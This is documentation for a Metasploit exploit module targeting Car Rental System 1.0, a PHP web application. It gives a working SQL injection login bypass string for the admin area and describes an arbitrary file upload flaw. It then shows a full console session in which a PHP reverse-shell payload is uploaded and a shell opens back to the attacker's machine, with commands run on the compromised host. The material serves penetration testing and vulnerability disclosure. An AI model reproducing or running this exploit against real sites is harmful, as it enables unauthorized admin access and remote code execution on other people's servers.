rapid7/metasploit-framework
# Adding Car Rental CMS 1.0 exploit

## Vulnerable Application

Car Rental System 1.0 is a Web Application to rent cars. It was write using PHP and MySQL.

Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code

to install, extract all files in a web directory, edit admin/db_connect.php, and create database following database/car_rental_db.sql

Opening the web page, we can login in /admin area using " ' OR 1=1 limit 1# " as username, and a random word as password; Giving "limit 1" we will select the first user: ADMIN

This software is also vulnerable for Arbitrary File Upload.

Vulnerable page: http://IP/Car_CMSHOME/admin/index.php?page=manage_car. Editing a Car record, you may upload a php file.

## Verification Steps

Confirm that functionality works:
1. Start `msfconsole`
2. `use exploit/multi/php/car_rental_system`
3. Set the `RHOST`.
4. Set the `TARGETURI`.
7. Set `LHOST` and `LPORT`
8. Run the exploit: `run`
9. Confirm you have now a reverse shell

**TARGETURI**
The path to the Car Rental System HOME directory.


## Scenarios

### Debian 10 running Apache2 and php7.3

```
msf6 exploit(multi/php/car_rental_system) > use exploit/multi/php/car_rental_system
[*] Using configured payload php/reverse_php
msf6 exploit(multi/php/car_rental_system) > set RHOSTS 192.168.0.130
RHOSTS => 192.168.0.130
msf6 exploit(multi/php/car_rental_system) > set TARGETURI /car_rental/
TARGETURI => /car_rental/
msf6 exploit(multi/php/car_rental_system) > set LHOST eth0
LHOST => eth0
msf6 exploit(multi/php/car_rental_system) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.114:4444 
[*] Attempting Login
msf6 exploit(multi/php/car_rental_system) > [*] Cookie: PHPSESSID=uokk0ufj0ujbphrte03upmsej7;
[*] Creating new car
[*] Last Images inserted id=6
[*] index.php?page=manage_car&id=6
[*] assets/uploads/cars_img/1605195300_sh_ell.php
[*] Command shell session 1 opened (192.168.0.114:4444 -> 192.168.0.130:56876) at 2020-11-12 16:34:58 +0100
msf6 exploit(multi/php/car_rental_system) > 
msf6 exploit(multi/php/car_rental_system) > sessions 

Active sessions
===============

  Id  Name  Type           Information  Connection
  --  ----  ----           -----------  ----------
  1         shell php/php               192.168.0.114:4444 -> 192.168.0.130:56876 (192.168.0.130)

msf6 exploit(multi/php/car_rental_system) > sessions 1
[*] Starting interaction with 1...

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

uname -a
Linux 6784e50e1781 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux


```
